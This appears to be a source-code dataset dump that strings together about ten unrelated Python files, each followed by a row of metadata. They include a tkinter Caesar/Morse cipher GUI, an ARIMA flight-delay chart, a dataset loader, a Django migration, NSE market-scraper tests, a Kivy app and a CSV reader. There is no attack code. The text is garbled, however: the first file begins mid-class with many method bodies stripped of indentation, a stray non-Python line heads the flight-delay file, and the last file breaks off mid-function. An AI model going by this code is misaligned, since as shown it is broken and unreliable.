self.decoding_labelframe = ttk.LabelFrame(self.decoding_tab, text = self.i18n_cryptography_playground.decoding_section_labelframe)
self.decoding_labelframe.grid(row = 0, padx = self.gui_settings.coding_section_padding_width, pady = self.gui_settings.padding_height)
def create_widgets_from_decoding_section_labelframe(self):
self.create_label_for_message_to_be_decrypted()
self.create_scrolledtext_for_message_to_be_decrypted()
self.create_label_for_decrypted_message()
self.create_scrolledtext_for_decrypted_message()
def create_label_for_message_to_be_decrypted(self):
self.label_for_message_to_be_decrypted = ttk.Label(self.decoding_labelframe, text = self.i18n_cryptography_playground.label_for_message_to_be_decrypted, font = (self.gui_settings.font_family, self.gui_settings.font_size))
self.label_for_message_to_be_decrypted.grid(row = 1)
def create_scrolledtext_for_message_to_be_decrypted(self):
self.scrolledtext_for_message_to_be_decrypted = scrolledtext.ScrolledText(self.decoding_labelframe, width = self.gui_settings.scrolledtext_width, height = self.gui_settings.scrolledtext_height, font = (self.gui_settings.font_family, self.gui_settings.font_size), wrap = tk.WORD)
self.scrolledtext_for_message_to_be_decrypted.grid(row = 2, pady = self.gui_settings.padding_height)
self.scrolledtext_for_message_to_be_decrypted.focus()
def create_label_for_decrypted_message(self):
self.label_decrypted_message = ttk.Label(self.decoding_labelframe, text = self.i18n_cryptography_playground.label_decrypted_message, font = (self.gui_settings.font_family, self.gui_settings.font_size))
self.label_decrypted_message.grid(row = 3)
def create_scrolledtext_for_decrypted_message(self):
self.scrolledtext_for_decrypted_message = scrolledtext.ScrolledText(self.decoding_labelframe, width = self.gui_settings.scrolledtext_width, height = self.gui_settings.scrolledtext_height, font = (self.gui_settings.font_family, self.gui_settings.font_size), wrap = tk.WORD)
self.scrolledtext_for_decrypted_message.grid(row = 4, pady = self.gui_settings.padding_height)
def create_decryption_options_labelframe(self):
self.decoding_tab_cryptography_options = ttk.LabelFrame(self.decoding_labelframe, text = self.i18n_cryptography_playground.cryptography_options)
self.decoding_tab_cryptography_options.grid(row = 5, pady = self.gui_settings.padding_height, sticky = tk.W)
def create_buttons_from_decryption_options(self):
self.create_caesar_decryption_button()
self.create_morse_decryption_button()
self.add_padding_to_decryption_buttons()
def create_caesar_decryption_button(self):
self.button_caesar_cryptography = ttk.Button(self.decoding_tab_cryptography_options, text = self.i18n_cryptography_playground.caesar_cryptography_button_text, command = lambda : self.process_message(Caesar, "decrypt", self.scrolledtext_for_message_to_be_decrypted, self.scrolledtext_for_decrypted_message))
self.button_caesar_cryptography.grid(column = 0, row = 0, sticky = tk.W)
def create_morse_decryption_button(self):
self.button_morse_cryptography = ttk.Button(self.decoding_tab_cryptography_options, text = self.i18n_cryptography_playground.morse_cryptography_button_text, command = lambda : self.process_message(Morse, "decrypt", self.scrolledtext_for_message_to_be_decrypted, self.scrolledtext_for_decrypted_message))
self.button_morse_cryptography.grid(column = 1, row = 0, sticky = tk.W)
def add_padding_to_decryption_buttons(self):
    """Apply the configured x/y padding to every widget in the options frame."""
    pad_x = self.gui_settings.padding_width
    pad_y = self.gui_settings.padding_height
    for child in self.decoding_tab_cryptography_options.winfo_children():
        child.grid_configure(padx=pad_x, pady=pad_y)
def close_window(self):
    """Shut down the Tk event loop, destroy the window and terminate the process."""
    self.window.quit()     # stop mainloop()
    self.window.destroy()  # release the Tk resources
    # Raise SystemExit directly instead of calling the exit() builtin: exit()
    # is injected by the `site` module for interactive use and is not
    # guaranteed to exist (e.g. when running under `python -S`).
    raise SystemExit()
def open_new_window(self):
    # Spawn a brand-new playground window; the instance registers itself with
    # Tk, so the reference does not need to be kept here.
    CryptographyPlayground()
def show_message_box(self, type, title, content):
    """Display a tkinter message box of the requested kind.

    *type* is matched case-insensitively against "info", "warning" and
    "error"; any other value is silently ignored (same as the original).
    """
    handlers = {
        "info": msg.showinfo,
        "warning": msg.showwarning,
        "error": msg.showerror,
    }
    handler = handlers.get(type.lower())
    if handler is not None:
        handler(title, content)
def change_message_on_scrolledtext(self, scrolledtext, message):
    """Replace the whole content of *scrolledtext* with *message*."""
    start, end = "1.0", "end"
    scrolledtext.delete(start, end)      # wipe everything currently displayed
    scrolledtext.insert(start, message)  # then write the new text
def get_text_from_scrolledtext(self, scrolledtext):
    """Return the widget's full text without the trailing newline, stripped."""
    # "end-1c" excludes the newline tkinter always appends at the end.
    return scrolledtext.get("1.0", "end-1c").strip()
def process_message(self, cryptography_algorithm, action, source_scrolledtext, destiny_scrolledtext):
    """Run *cryptography_algorithm* on the source widget's text and show the result.

    *action* selects "encrypt" or "decrypt". An empty source pops a warning
    box; any failure inside the algorithm pops an error box.
    """
    source_message = self.get_text_from_scrolledtext(source_scrolledtext)
    if not source_message:
        self.show_message_box(
            "warning",
            self.i18n_message_box.nothing_written_warning_title,
            self.i18n_message_box.nothing_written_warning_content,
        )
        return
    try:
        if action == "encrypt":
            destiny_message = cryptography_algorithm().encrypt(source_message)
        elif action == "decrypt":
            destiny_message = cryptography_algorithm().decrypt(source_message)
        self.change_message_on_scrolledtext(destiny_scrolledtext, destiny_message)
        destiny_scrolledtext.focus()
    except Exception as exception:
        print(exception)
        self.show_message_box(
            "error",
            self.i18n_message_box.process_error_title,
            self.i18n_message_box.process_error_content,
        )
if __name__ == "__main__":
cryptography_playground = CryptographyPlayground()
cryptography_playground.window.mainloop() | 46.611111 | 314 | 0.763409 | 1,696 | 13,424 | 5.627948 | 0.090212 | 0.048402 | 0.061289 | 0.035202 | 0.713567 | 0.618963 | 0.560922 | 0.518806 | 0.477318 | 0.42483 | 0 | 0.008657 | 0.156734 | 13,424 | 288 | 315 | 46.611111 | 0.834541 | 0 | 0 | 0.032086 | 0 | 0 | 0.009683 | 0.001937 | 0 | 0 | 0 | 0 | 0 | 1 | 0.240642 | false | 0 | 0.058824 | 0 | 0.31016 | 0.005348 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25330a3bb45b3599bdfbcbefed2e79ea7956ce76 | 1,234 | py | Python | chapter 9/sampleCode43.py | DTAIEB/Thoughtful-Data-Science | 8b80e8f3e33b6fdc6672ecee1f27e0b983b28241 | [
"Apache-2.0"
] | 15 | 2018-06-01T19:18:32.000Z | 2021-11-28T03:31:35.000Z | chapter 9/sampleCode43.py | chshychen/Thoughtful-Data-Science | 8b80e8f3e33b6fdc6672ecee1f27e0b983b28241 | [
"Apache-2.0"
] | 1 | 2018-12-17T02:01:42.000Z | 2018-12-17T02:01:42.000Z | chapter 9/sampleCode43.py | chshychen/Thoughtful-Data-Science | 8b80e8f3e33b6fdc6672ecee1f27e0b983b28241 | [
"Apache-2.0"
] | 10 | 2018-09-23T02:45:45.000Z | 2022-03-12T15:32:05.000Z | [[PredictDelayApp]]
# PixieDust route: "*" matches any value, so this screen renders whenever both
# flight_segment and airline exist in the app state.
@route(flight_segment="*", airline="*")
@captureOutput
def predict_screen(self, flight_segment, airline):
    """Render an ARIMA in-sample delay-prediction chart for one flight segment.

    Relies on module-level names defined elsewhere in the app/notebook:
    ``flights`` (DataFrame of flight records), ``warnings``, ``ARIMA``
    (statsmodels) and ``plt`` (matplotlib.pyplot).
    """
    if flight_segment is None or flight_segment == "":
        return "<div>Please select a flight segment</div>"
    # flight_segment looks like "<something>:<destination airport>" — the
    # split below keeps only the airport code after the colon.
    airport = flight_segment.split(":")[1]
    mask = (flights["DESTINATION_AIRPORT"] == airport)
    if airline is not None and airline != "":
        mask = mask & (flights["AIRLINE"] == airline)
    df = flights[mask]
    # Index by departure time so ARIMA sees a time series; keep only the most
    # recent 50k rows and drop duplicate timestamps (ARIMA needs unique index).
    df.index = df["DEPARTURE_TIME"]
    df = df.tail(50000)
    df = df[~df.index.duplicated(keep='first')]
    with warnings.catch_warnings():
        # statsmodels emits convergence/frequency warnings here; silence them.
        warnings.simplefilter("ignore")
        arima_model_class = ARIMA(df["ARRIVAL_DELAY"], dates=df['DEPARTURE_TIME'], order=(1,1,1))
        arima_model = arima_model_class.fit(disp=0)
    fig, ax = plt.subplots(figsize = (12,8))
    # Plot in-sample predictions over the last 100 observations.
    num_observations = 100
    date_series = df["DEPARTURE_TIME"]
    arima_model.plot_predict(
        start = str(date_series[len(date_series)-num_observations]),
        end = str(date_series[len(date_series)-1]),
        ax = ax
    )
    plt.show()
| 44.071429 | 101 | 0.577796 | 140 | 1,234 | 4.907143 | 0.492857 | 0.113537 | 0.065502 | 0.046579 | 0.075691 | 0.075691 | 0 | 0 | 0 | 0 | 0 | 0.019384 | 0.289303 | 1,234 | 27 | 102 | 45.703704 | 0.763968 | 0 | 0 | 0 | 0 | 0 | 0.110211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
253d9842198f444263b15bae02608b8b21a7d23d | 1,057 | py | Python | src/datasets/main.py | geostk/deepSVDD | caf44c93914414ca26525fec69b780e920b9d061 | [
"MIT"
] | 4 | 2018-06-26T13:11:34.000Z | 2018-07-21T02:54:29.000Z | src/datasets/main.py | gsrs/deepSVDD | caf44c93914414ca26525fec69b780e920b9d061 | [
"MIT"
] | null | null | null | src/datasets/main.py | gsrs/deepSVDD | caf44c93914414ca26525fec69b780e920b9d061 | [
"MIT"
] | null | null | null | from datasets.__local__ import implemented_datasets
from datasets.mnist import MNIST_DataLoader
from datasets.cifar10 import CIFAR_10_DataLoader
from datasets.bedroom import Bedroom_DataLoader
from datasets.toy import ToySeq_DataLoader
from datasets.normal import Normal_DataLoader
from datasets.adult import Adult_DataLoader
def load_dataset(learner, dataset_name, pretrain=False):
    """Attach the data loader matching *dataset_name* to *learner* and load its data.

    :param learner: object exposing ``load_data`` and a ``data`` attribute
    :param dataset_name: one of the names in ``implemented_datasets``
    :param pretrain: forwarded to ``learner.load_data``
    """
    assert dataset_name in implemented_datasets

    # Dispatch table instead of a chain of non-exclusive `if`s: the original
    # left `data_loader` unbound (NameError) for a name that passed the
    # assert but matched no branch; a KeyError here names the dataset.
    loaders = {
        "mnist": MNIST_DataLoader,
        "cifar10": CIFAR_10_DataLoader,
        "bedroom": Bedroom_DataLoader,
        "toyseq": ToySeq_DataLoader,
        "normal": Normal_DataLoader,
        "adult": Adult_DataLoader,
    }
    data_loader = loaders[dataset_name]

    # load data with data loader
    learner.load_data(data_loader=data_loader, pretrain=pretrain)

    # check all parameters have been attributed
    learner.data.check_all()
| 28.567568 | 65 | 0.755913 | 130 | 1,057 | 5.846154 | 0.261538 | 0.118421 | 0.102632 | 0.151316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009302 | 0.186377 | 1,057 | 36 | 66 | 29.361111 | 0.874419 | 0.064333 | 0 | 0 | 0 | 0 | 0.036511 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.043478 | false | 0 | 0.304348 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
2542698ba96bb724294402a12a63e6c7c61bdcef | 219 | py | Python | hydrate.py | dlitvakb/horrible_dad_jokes_bot | d42f35d042f8726b0c6c5839e503d2fb458df105 | [
"Unlicense"
] | 3 | 2018-04-03T23:49:25.000Z | 2018-09-17T00:34:06.000Z | hydrate.py | dlitvakb/horrible_dad_jokes_bot | d42f35d042f8726b0c6c5839e503d2fb458df105 | [
"Unlicense"
] | 1 | 2021-06-01T22:01:08.000Z | 2021-06-01T22:01:08.000Z | hydrate.py | dlitvakb/horrible_dad_jokes_bot | d42f35d042f8726b0c6c5839e503d2fb458df105 | [
"Unlicense"
] | null | null | null | from scraper import TwitterScraper, ICanHazDadJokeScraper
# Scrapers to run, in order: the Twitter account first, then icanhazdadjoke.
scrapers = [
    TwitterScraper('baddadjokes'),
    ICanHazDadJokeScraper()
]

# Script entry point: run every configured scraper once.
if __name__ == '__main__':
    for scraper in scrapers:
        scraper.scrape()
| 19.909091 | 57 | 0.716895 | 18 | 219 | 8.277778 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191781 | 219 | 10 | 58 | 21.9 | 0.841808 | 0 | 0 | 0 | 0 | 0 | 0.086758 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
254cd5b3b4136d0220aa87f1ce969c3493e9878b | 617 | py | Python | enroll/migrations/0002_auto_20210409_2221.py | RitabrataDas343/Farmtract | a51f18408778295c5f7febc8d632d3556b0249e2 | [
"Apache-2.0"
] | 1 | 2021-04-10T10:35:07.000Z | 2021-04-10T10:35:07.000Z | enroll/migrations/0002_auto_20210409_2221.py | RitabrataDas343/Farmtract | a51f18408778295c5f7febc8d632d3556b0249e2 | [
"Apache-2.0"
] | null | null | null | enroll/migrations/0002_auto_20210409_2221.py | RitabrataDas343/Farmtract | a51f18408778295c5f7febc8d632d3556b0249e2 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.7 on 2021-04-09 22:21
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django schema migration: renames User.regnum to roll,
    # drops User.rollnum, and adds an optional User.birthdate.

    dependencies = [
        ('enroll', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name='user',
            old_name='regnum',
            new_name='roll',
        ),
        migrations.RemoveField(
            model_name='user',
            name='rollnum',
        ),
        migrations.AddField(
            model_name='user',
            name='birthdate',
            # Nullable so existing rows migrate without a default value.
            field=models.DateField(blank=True, null=True),
        ),
    ]
| 22.035714 | 58 | 0.534846 | 59 | 617 | 5.491525 | 0.694915 | 0.083333 | 0.12037 | 0.104938 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04703 | 0.345219 | 617 | 27 | 59 | 22.851852 | 0.754951 | 0.072934 | 0 | 0.285714 | 1 | 0 | 0.098246 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
254db43a4110c2edf1d3ec0af8cea5703fdfd641 | 3,421 | py | Python | Tests/Test.py | GamesBond008/NSE-India-Scrapper | 9963d1b99ee5557e61d6be329bf9f50444d2820a | [
"MIT"
] | 1 | 2021-06-01T19:36:42.000Z | 2021-06-01T19:36:42.000Z | Tests/Test.py | GamesBond008/NSE-India-Scrapper | 9963d1b99ee5557e61d6be329bf9f50444d2820a | [
"MIT"
] | null | null | null | Tests/Test.py | GamesBond008/NSE-India-Scrapper | 9963d1b99ee5557e61d6be329bf9f50444d2820a | [
"MIT"
] | null | null | null | import unittest,sys,datetime
sys.path.insert(0,'..')
from NSE.companies import Companies
from NSE.derivatives import Derivatives
from NSE.equitySMEMarket import EquitySMEMarket
from NSE.indices import Indices
from NSE.preOpenMarket import PreOpenMarket
from NSE import ValidSymbols
# Stock symbol used by every company-level test below.
Sample_Company="RBLBANK"
# Equity series codes to request historical data for (EQ and RL).
Series=[ValidSymbols['COMPANIES']['EQ'],ValidSymbols['COMPANIES']['RL']]
class TestNSE(unittest.TestCase):
    """Integration tests for the NSE scraper wrappers.

    NOTE(review): these tests call the live NSE endpoints through the wrapper
    classes, so they need network access and depend on current market data.
    """

    @classmethod
    def setUpClass(cls):
        # One shared instance of each wrapper for the whole test class.
        cls.companies=Companies()
        cls.equitySMEMarket=EquitySMEMarket()
        cls.deriatives=Derivatives()
        cls.indices=Indices()
        cls.preOpenMarket=PreOpenMarket()

    def test_init(self):
        # Constructing Companies with a negative argument must be rejected.
        self.assertRaises(ValueError,Companies,-1)

    def test_Company(self):
        # Price info: payload shape and that the symbol round-trips.
        results=self.companies.GetPriceInfo(Sample_Company)
        self.assertGreaterEqual(len(results),5)
        self.assertEqual(results['info']['symbol'],Sample_Company)
        results=self.companies.GetTradeInfo(Sample_Company)
        self.assertGreaterEqual(len(results),4)
        # Historical data: meta section echoes the requested symbol/series.
        results=self.companies.HistoricalData(Sample_Company,Series,'1m')
        self.assertGreaterEqual(len(results),2)
        self.assertEqual(results['meta']['symbols'][0],'RBLBANK')
        self.assertEqual(results['meta']['series'],['EQ','RL'])
        self.assertGreaterEqual(len(results['data']),0)
        # Invalid period codes, malformed dates and wrong argument types.
        self.assertRaises(ValueError,self.companies.HistoricalData,Sample_Company,Series,TimePeriod='1e')
        self.assertRaises(ValueError,self.companies.HistoricalData,Sample_Company,Series,Start='2021-04-2021',End='06-02-2021')
        self.assertRaises(ValueError,self.companies.HistoricalData,Sample_Company,Series,TimePeriod=['1'])
        self.assertRaises(Exception,self.companies.HistoricalData,Sample_Company,Series,Start=12,End=23)
        #Getting Data For Future Dates
        self.assertRaises(Exception,self.companies.HistoricalData,Sample_Company,Series,Start='20-07-2022',End='20-05-2025')

    def test_derivatives(self):
        # Equity derivatives: top-20 contracts list has exactly 20 rows.
        results=self.deriatives.EquityDerivatives(self.deriatives.TOP20CONTRACTS)
        self.assertEqual(len(results),3)
        self.assertEqual(len(results['data']),20)
        results=self.deriatives.EquityDerivatives(self.deriatives.NIFTY50OPTIONS)
        self.assertGreaterEqual(len(results['data']),50)
        # self.assertRaises(RuntimeError,self.deriatives.EquityDerivatives,'sdsfsd')
        # Currency contracts are not valid for the equity endpoint.
        self.assertRaises(ValueError,self.deriatives.EquityDerivatives,self.deriatives.ALLINRCONTRACTS)
        self.assertGreaterEqual(len(self.deriatives.CurrencyDerivatives(self.deriatives.ALLINRCONTRACTS)['data']),1)
        self.assertGreaterEqual(len(self.deriatives.CommodityDerivatives(self.deriatives.AGRICONTRACTS)['data']),1)
        self.assertGreaterEqual(len(self.deriatives.InterestRateDerivatives(self.deriatives.GOVTSECFUTURES)),1)

    def test_equity_sme_market(self):
        # A non-index argument (empty dict) must be rejected.
        self.assertRaises(ValueError,self.equitySMEMarket.EquityMarketWatch,{})
        self.assertGreaterEqual(len(self.equitySMEMarket.EquityMarketWatch(self.equitySMEMarket.NIFTY_50)),1)
        self.assertGreaterEqual(len(self.equitySMEMarket.SGBMarketWatch()['data']),1)
        self.assertGreaterEqual(len(self.equitySMEMarket.ExchangeTradeFundsWatch()['data']),1)
        self.assertGreaterEqual(len(self.equitySMEMarket.SMEMarketWatch()['data']),1)

    def test_indices(self):
        self.assertGreaterEqual(len(self.indices.IndicesMarketWatch()['data']),1)

    def test_preOpenMarket(self):
        self.assertGreaterEqual(len(self.preOpenMarket.PreOpenMarket(self.preOpenMarket.NIFTYBANK)),1)
        self.assertRaises(ValueError,self.preOpenMarket.PreOpenMarket,{})
if __name__=='__main__':
unittest.main() | 56.081967 | 121 | 0.808536 | 386 | 3,421 | 7.095855 | 0.251295 | 0.11245 | 0.127784 | 0.09529 | 0.412559 | 0.315444 | 0.211391 | 0.141658 | 0.141658 | 0.115371 | 0 | 0.020994 | 0.053201 | 3,421 | 61 | 122 | 56.081967 | 0.824637 | 0.0304 | 0 | 0 | 0 | 0 | 0.049457 | 0 | 0 | 0 | 0 | 0 | 0.474576 | 1 | 0.118644 | false | 0 | 0.118644 | 0 | 0.254237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25579699ea8aae8b203d129009a97d6fa5a1aaf4 | 493 | py | Python | example1/参考/buttonlauncher2.py | SasuraiNoHoge/Kivy_practice | c046660cb3f3b9180dec9d65e2cd74347c6636c9 | [
"MIT"
] | 4 | 2017-09-23T15:03:17.000Z | 2020-12-05T22:06:20.000Z | example1/参考/buttonlauncher2.py | SasuraiNoHoge/Kivy_practice | c046660cb3f3b9180dec9d65e2cd74347c6636c9 | [
"MIT"
] | 1 | 2020-03-10T21:54:25.000Z | 2020-03-10T21:54:25.000Z | example1/参考/buttonlauncher2.py | SasuraiNoHoge/Kivy_practice | c046660cb3f3b9180dec9d65e2cd74347c6636c9 | [
"MIT"
] | 7 | 2017-11-17T02:38:18.000Z | 2021-09-26T14:23:58.000Z | # -*- coding: utf-8 -*-
import kivy
kivy.require('1.9.0')
from kivy.app import App
from kivy.config import Config
from kivy.uix.widget import Widget
from kivy.uix.label import Label
from kivy.lang import Builder
# Load the widget-tree definition for this app from its companion kv file.
Builder.load_file('buttonlauncher2.kv')
class MyWidget(Widget):
    """Root widget; its layout comes from buttonlauncher2.kv."""

    def __init__(self, **kwargs):
        # Forward kwargs to the base Widget so construction-time properties
        # (size hints, ids, ...) are honoured — the original called
        # super().__init__() with no arguments and silently dropped them.
        super(MyWidget, self).__init__(**kwargs)
class ButtonLauncher2App(App):
    """Application shell whose root widget is a MyWidget instance."""

    def build(self):
        root = MyWidget()
        return root
if __name__ == '__main__':
ButtonLauncher2App().run() | 20.541667 | 40 | 0.709939 | 66 | 493 | 5.045455 | 0.530303 | 0.12012 | 0.066066 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01699 | 0.1643 | 493 | 24 | 41 | 20.541667 | 0.791262 | 0.042596 | 0 | 0 | 0 | 0 | 0.065817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0.0625 | 0.6875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
255a33ce29c26d4168ff7ae800d882e91dd942a0 | 225 | py | Python | vseros/2016-17/okr/genom.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | null | null | null | vseros/2016-17/okr/genom.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | null | null | null | vseros/2016-17/okr/genom.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | 1 | 2018-09-14T18:50:48.000Z | 2018-09-14T18:50:48.000Z | s = input()
# `s` (the first genome string) was read on the preceding line.
# Tally how often each adjacent character pair (bigram) occurs in it.
g1 = {}
for j in range(1, len(s)):
    pair = s[j-1: j+1]
    g1[pair] = g1.get(pair, 0) + 1

# Read the second genome and collect its distinct bigrams.
s = input()
g2 = {s[j-1: j+1] for j in range(1, len(s))}

# Print the total count (within the first string) of bigrams present in both.
print(sum(g1[p] for p in set(g1) & g2))
| 22.5 | 54 | 0.506667 | 54 | 225 | 2.111111 | 0.351852 | 0.105263 | 0.078947 | 0.105263 | 0.412281 | 0.280702 | 0.280702 | 0 | 0 | 0 | 0 | 0.101124 | 0.208889 | 225 | 9 | 55 | 25 | 0.539326 | 0 | 0 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
255be9e1908b2bbd852a467ab339fc0b83e09dd3 | 1,864 | py | Python | anemoi/utils/mixins.py | looselycoupled/anemoi | b494a8e1bc70feda882a7ed3a1ca0cb17fc1f486 | [
"MIT"
] | null | null | null | anemoi/utils/mixins.py | looselycoupled/anemoi | b494a8e1bc70feda882a7ed3a1ca0cb17fc1f486 | [
"MIT"
] | 2 | 2017-08-09T14:24:15.000Z | 2021-06-01T22:02:42.000Z | anemoi/utils/mixins.py | looselycoupled/anemoi | b494a8e1bc70feda882a7ed3a1ca0cb17fc1f486 | [
"MIT"
] | 1 | 2017-08-09T16:58:38.000Z | 2017-08-09T16:58:38.000Z | # anemoi.utils.mixins
# Mixin classes for convencience and central configuration
#
# Author: Allen Leis <allen.leis@gmail.com>
# Created: Sat Aug 05 15:40:46 2017 -0400
#
# Copyright (C) 2017 Allen Leis
# For license information, see LICENSE
#
# ID: mixins.py [] allen.leis@gmail.com $
"""
Mixin classes for convencience and central configuration
"""
##########################################################################
# Imports
##########################################################################
import os
import sys
import logging
import logging.config
try:
from anemoi.config import settings
except ImportError as e:
sys.path.insert(0, os.getcwd())
from anemoi.config import settings
##########################################################################
# Classes
##########################################################################
class LoggableMixin(object):
    """
    Mixin that equips a class with the project-wide 'anemoi' logger.

    Possible TODO features include:
        self.logger.error() should email admins
    """

    def __init__(self, *args, **kwargs):
        # Apply the central logging configuration, then grab the shared logger.
        dict_config = settings.logging.dict_config()
        logging.config.dictConfigClass(dict_config).configure()
        self.logger = logging.getLogger('anemoi')
        super(LoggableMixin, self).__init__(*args, **kwargs)
##########################################################################
# Execution
##########################################################################
# Smoke-test: exercise every log level plus exception logging when run directly.
if __name__ == '__main__':
    obj = LoggableMixin()
    obj.logger.debug("Test for debug...")
    obj.logger.info("Test for info...")
    obj.logger.warning("Test for warning...")
    obj.logger.error("Test for error...")
    obj.logger.critical("Test for critical...")
    try:
        # Deliberately raise ZeroDivisionError to demo logger.exception().
        1/0
    except Exception as e:
        obj.logger.exception(e)
| 29.125 | 82 | 0.521996 | 178 | 1,864 | 5.370787 | 0.494382 | 0.056485 | 0.031381 | 0.056485 | 0.167364 | 0.104603 | 0.104603 | 0 | 0 | 0 | 0 | 0.014529 | 0.150751 | 1,864 | 63 | 83 | 29.587302 | 0.589387 | 0.280043 | 0 | 0.16 | 0 | 0 | 0.121034 | 0 | 0 | 0 | 0 | 0.015873 | 0 | 1 | 0.04 | false | 0 | 0.28 | 0 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
255cff2bdfaa41fa3a18b09cdbbe3b37020dfaa2 | 3,177 | py | Python | csv_to_dict.py | vtsuperdarn/SD_exodus | d486614e40f2bb60abf5aafc412a15551cc09d20 | [
"MIT"
] | null | null | null | csv_to_dict.py | vtsuperdarn/SD_exodus | d486614e40f2bb60abf5aafc412a15551cc09d20 | [
"MIT"
] | null | null | null | csv_to_dict.py | vtsuperdarn/SD_exodus | d486614e40f2bb60abf5aafc412a15551cc09d20 | [
"MIT"
] | null | null | null | """
Written by Muhammad on 09/02/2018
"""
import datetime as dt
import logging
import numpy as np
import pandas as pd
import ast
def csv_to_dict(fname, stime=None, etime=None, sep="|", orient="list"):
    """Reads data from a csv file and returns a dictionary.

    Parameter
    ---------
    fname : str
        Full path of a csv file.
    stime : Optional[datetime.datetime]
        The start time of interest
    etime : Optional[datetime.datetime]
        The end time of interest.
        If set to None, reads data to the end of a day
    sep : str
        Delimiter to use
    orient : str
        Kept for interface compatibility; the returned dict is always
        column-oriented ("list"), matching the original behavior.

    Returns
    -------
    data_dict : dict
        A dictionary object that holds the data
    """
    # Load to a pandas dataframe
    print("Loading csv file to pandas dataframe")
    df = pd.read_csv(fname, sep=sep, na_values="None")
    # Parse the time column explicitly: the `date_parser` argument of
    # read_csv is deprecated and removed in recent pandas releases.
    df["time"] = pd.to_datetime(df["time"], format="%Y-%m-%d %H:%M:%S")
    if stime is not None:
        df = df.loc[df.time >= stime, :]
    if etime is not None:
        df = df.loc[df.time <= etime, :]

    # Convert to a dict
    print("Converting pandas dataframe to dict")
    # NOTE: list orientation is used even when records orientation is wanted,
    # because some columns hold list-valued cells that pandas reads back as
    # strings; they are decoded below with ast.literal_eval.
    data_dict = df.to_dict(orient="list")
    # (A stray Python-2 `print df["ptab"].dtypes` debug statement lived here
    # in the original — it was a SyntaxError under Python 3 and was removed.)

    # Columns whose cells are string representations of Python lists.
    prm_keys = ["ptab", "ltab"]
    fit_keys = ["elv", "gflg", "nlag", "p_l", "p_l_e", "p_s",
                "p_s_e", "phi0", "phi0_e", "pwr0", "qflg", "slist", "v",
                "v_e", "w_l", "w_l_e", "w_s", "w_s_e"]
    keys_list = prm_keys + fit_keys
    print("Converting string representation of lists to normal lists")
